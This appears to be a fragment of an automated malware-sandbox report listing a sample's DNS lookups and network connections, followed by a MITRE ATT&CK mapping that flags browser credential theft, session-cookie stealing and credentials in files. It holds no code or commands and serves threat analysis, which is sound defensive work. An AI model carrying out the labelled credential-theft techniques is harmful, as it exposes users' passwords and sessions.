105 B
1
1

DNS Request

clients2.google.com

DNS Response

216.58.204.78
216.58.204.78:443

clients2.google.com

https

chrome.exe

3.9kB
8.0kB
10
12
224.0.0.251:5353

chrome.exe

204 B
3
8.8.8.8:53

78.204.58.216.in-addr.arpa

dns

72 B
171 B
1
1

DNS Request

78.204.58.216.in-addr.arpa
8.8.8.8:53

56.163.245.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

56.163.245.4.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

67.209.201.84.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

67.209.201.84.in-addr.arpa
8.8.8.8:53

57.169.31.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

57.169.31.20.in-addr.arpa
8.8.8.8:53

48.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

48.229.111.52.in-addr.arpa
8.8.8.8:53

43.58.199.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

43.58.199.20.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
170 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

150.171.27.10

150.171.28.10

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Modify Authentication Process

Privilege Escalation

Defense Evasion

Modify Authentication Process

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery